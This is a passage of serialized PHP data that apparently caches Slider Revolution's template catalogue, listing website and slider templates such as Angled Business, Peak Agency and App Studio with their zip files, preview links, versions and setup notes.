Services\";s:5:\"alias\";s:15:\"angled-services\";s:3:\"zip\";s:25:\"packs/angled-services.zip\";s:3:\"uid\";s:32:\"7605651c1487e1a6c32edc70017be8ad\";s:3:\"img\";s:26:\"angled-services/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/angled-business-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Angled Business\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"20\";s:9:\"installed\";b:0;}i:293;a:25:{s:2:\"id\";s:3:\"302\";s:5:\"title\";s:14:\"Angled Success\";s:5:\"alias\";s:14:\"angled-success\";s:3:\"zip\";s:24:\"packs/angled-success.zip\";s:3:\"uid\";s:32:\"9e3fa974a42ecf80e1ec6ff991fca430\";s:3:\"img\";s:25:\"angled-success/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/angled-business-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Angled Business\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"20\";s:9:\"installed\";b:0;}i:294;a:25:{s:2:\"id\";s:3:\"303\";s:5:\"title\";s:13:\"Angled Footer\";s:5:\"alias\";s:13:\"angled-footer\";s:3:\"zip\";s:23:\"packs/angled-footer.zip\";s:3:\"uid\";s:32:\"aed4eaa2f7883351ba9c9947feef153e\";s:3:\"img\";s:24:\"angled-footer/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/angled-business-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Angled Business\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"20\";s:9:\"installed\";b:0;}i:295;a:25:{s:2:\"id\";s:3:\"304\";s:5:\"title\";s:20:\"Angled Content Modal\";s:5:\"alias\";s:20:\"angled-content-modal\";s:3:\"zip\";s:30:\"packs/angled-content-modal.zip\";s:3:\"uid\";s:32:\"4ddc74515fdf84f974217e4ed47a7c66\";s:3:\"img\";s:31:\"angled-content-modal/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/angled-business-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Angled Business\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"20\";s:9:\"installed\";b:0;}i:296;a:22:{s:2:\"id\";s:3:\"312\";s:5:\"title\";s:24:\"Retouch Before and After\";s:5:\"alias\";s:7:\"Retouch\";s:3:\"zip\";s:11:\"Retouch.zip\";s:3:\"uid\";s:32:\"58894991f1abd8b448c8d353b1b5fe76\";s:3:\"img\";s:18:\"Retouch/slide1.jpg\";s:7:\"preview\";s:61:\"http://revolution.themepunch.com/retouch-before-after-slider/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:155:\"<span class=\"ttm_content\">The Retouch Slider is the perfect way to compare your photos before and after retouching.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-beforeafter-addon\\/revslider-beforeafter-addon.php\",\"name\":\"Before After AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:297;a:22:{s:2:\"id\";s:3:\"313\";s:5:\"title\";s:11:\"Tech Slider\";s:5:\"alias\";s:11:\"tech-slider\";s:3:\"zip\";s:15:\"tech-slider.zip\";s:3:\"uid\";s:32:\"a98e2b264f00a1116d21808c6a543162\";s:3:\"img\";s:22:\"tech-slider/slide1.jpg\";s:7:\"preview\";s:63:\"http://revolution.themepunch.com/tech-showcase-slider-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:153:\"<span class=\"ttm_content\">This classic slider module with sleek device mockups features a smooth parallax effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:298;a:25:{s:2:\"id\";s:3:\"314\";s:5:\"title\";s:19:\"Peak Agency Website\";s:5:\"alias\";s:19:\"peak-agency-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:27:\"peak-agency-website-package\";s:3:\"img\";s:25:\"packages/peak_package.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/peak-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:129:\"<span class=\"ttm_content\">The Peak Agency Website template is a minimal, light one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Peak Agency\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"22\";s:9:\"installed\";b:0;}i:299;a:25:{s:2:\"id\";s:3:\"315\";s:5:\"title\";s:11:\"Peak Header\";s:5:\"alias\";s:11:\"peak-header\";s:3:\"zip\";s:21:\"packs/peak-header.zip\";s:3:\"uid\";s:32:\"b721bd612e9fbc5182418ad3fd7d0808\";s:3:\"img\";s:22:\"peak-header/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/peak-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:129:\"<span class=\"ttm_content\">The Peak Agency Website template is a minimal, light one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Peak Agency\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"22\";s:9:\"installed\";b:0;}i:300;a:25:{s:2:\"id\";s:3:\"316\";s:5:\"title\";s:10:\"Peak About\";s:5:\"alias\";s:10:\"peak-about\";s:3:\"zip\";s:20:\"packs/peak-about.zip\";s:3:\"uid\";s:32:\"7e68b1012fb03490d45c7f79e8cb1b19\";s:3:\"img\";s:21:\"peak-about/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/peak-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:129:\"<span class=\"ttm_content\">The Peak Agency Website template is a minimal, light one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Peak Agency\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"22\";s:9:\"installed\";b:0;}i:301;a:25:{s:2:\"id\";s:3:\"317\";s:5:\"title\";s:14:\"Peak Portfolio\";s:5:\"alias\";s:14:\"peak-portfolio\";s:3:\"zip\";s:24:\"packs/peak-portfolio.zip\";s:3:\"uid\";s:32:\"6198d1885ba9e95221c33e404f21bdbc\";s:3:\"img\";s:25:\"peak-portfolio/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/peak-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:129:\"<span class=\"ttm_content\">The Peak Agency Website template is a minimal, light one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Peak Agency\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"22\";s:9:\"installed\";b:0;}i:302;a:25:{s:2:\"id\";s:3:\"318\";s:5:\"title\";s:11:\"Peak Footer\";s:5:\"alias\";s:11:\"peak-footer\";s:3:\"zip\";s:21:\"packs/peak-footer.zip\";s:3:\"uid\";s:32:\"2dead6897ad3b3a709b380d81242f76b\";s:3:\"img\";s:22:\"peak-footer/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/peak-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:129:\"<span class=\"ttm_content\">The Peak Agency Website template is a minimal, light one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Peak Agency\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"22\";s:9:\"installed\";b:0;}i:303;a:25:{s:2:\"id\";s:3:\"319\";s:5:\"title\";s:24:\"Modern Portfolio Website\";s:5:\"alias\";s:24:\"modern-portfolio-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:32:\"modern-portfolio-website-package\";s:3:\"img\";s:30:\"packages/portfolio-package.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/modern-portfolio-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:145:\"<span class=\"ttm_content\">A modern portfolio template with fancy scroll animations and a colorful design.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"Modern Portfolio\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"23\";s:9:\"installed\";b:0;}i:304;a:25:{s:2:\"id\";s:3:\"320\";s:5:\"title\";s:17:\"Portfolio Welcome\";s:5:\"alias\";s:17:\"portfolio-welcome\";s:3:\"zip\";s:27:\"packs/portfolio-welcome.zip\";s:3:\"uid\";s:32:\"97336b8785e4a7b27facaf1547e0464d\";s:3:\"img\";s:28:\"portfolio-welcome/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/modern-portfolio-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:145:\"<span class=\"ttm_content\">A modern portfolio template with fancy scroll animations and a colorful design.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"Modern Portfolio\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"23\";s:9:\"installed\";b:0;}i:305;a:25:{s:2:\"id\";s:3:\"321\";s:5:\"title\";s:15:\"Portfolio About\";s:5:\"alias\";s:15:\"portfolio-about\";s:3:\"zip\";s:25:\"packs/portfolio-about.zip\";s:3:\"uid\";s:32:\"5d3a4724fd453de5313ceb6696c1db62\";s:3:\"img\";s:26:\"portfolio-about/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/modern-portfolio-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:145:\"<span class=\"ttm_content\">A modern portfolio template with fancy scroll animations and a colorful design.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"Modern Portfolio\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"23\";s:9:\"installed\";b:0;}i:306;a:25:{s:2:\"id\";s:3:\"322\";s:5:\"title\";s:21:\"Portfolio Works Title\";s:5:\"alias\";s:21:\"portfolio-works-title\";s:3:\"zip\";s:31:\"packs/portfolio-works-title.zip\";s:3:\"uid\";s:32:\"cbb5c6e875cc1f25b463fdf89cabef28\";s:3:\"img\";s:32:\"portfolio-works-title/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/modern-portfolio-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:145:\"<span class=\"ttm_content\">A modern portfolio template with fancy scroll animations and a colorful design.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"Modern Portfolio\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"23\";s:9:\"installed\";b:0;}i:307;a:25:{s:2:\"id\";s:3:\"323\";s:5:\"title\";s:23:\"Portfolio Works Content\";s:5:\"alias\";s:23:\"portfolio-works-content\";s:3:\"zip\";s:33:\"packs/portfolio-works-content.zip\";s:3:\"uid\";s:32:\"5c87311128c7794ffa6ee07ea0648082\";s:3:\"img\";s:34:\"portfolio-works-content/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/modern-portfolio-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:145:\"<span class=\"ttm_content\">A modern portfolio template with fancy scroll animations and a colorful design.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"Modern Portfolio\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"23\";s:9:\"installed\";b:0;}i:308;a:25:{s:2:\"id\";s:3:\"324\";s:5:\"title\";s:18:\"Portfolio Contacts\";s:5:\"alias\";s:18:\"portfolio-contacts\";s:3:\"zip\";s:28:\"packs/portfolio-contacts.zip\";s:3:\"uid\";s:32:\"bd81feffad83b69218f7e837478038e5\";s:3:\"img\";s:29:\"portfolio-contacts/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/modern-portfolio-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:145:\"<span class=\"ttm_content\">A modern portfolio template with fancy scroll animations and a colorful design.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"Modern Portfolio\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"23\";s:9:\"installed\";b:0;}i:309;a:25:{s:2:\"id\";s:3:\"325\";s:5:\"title\";s:18:\"App Studio Website\";s:5:\"alias\";s:18:\"app-studio-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:26:\"app-studio-website-package\";s:3:\"img\";s:31:\"packages/App_Studio_package.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/app-studio-website/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:149:\"<span class=\"ttm_content\">A modern one-page presentation website to present your mobile app development team.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:10:\"App Studio\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"24\";s:9:\"installed\";b:0;}i:310;a:25:{s:2:\"id\";s:3:\"326\";s:5:\"title\";s:18:\"App Studio Welcome\";s:5:\"alias\";s:18:\"App-Studio-Welcome\";s:3:\"zip\";s:28:\"packs/App-Studio-Welcome.zip\";s:3:\"uid\";s:32:\"2ce0f3c54214b04e6c3a9becfd59730c\";s:3:\"img\";s:29:\"App-Studio-Welcome/slide1.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/app-studio-website/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:149:\"<span class=\"ttm_content\">A modern one-page presentation website to present your mobile app development team.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" 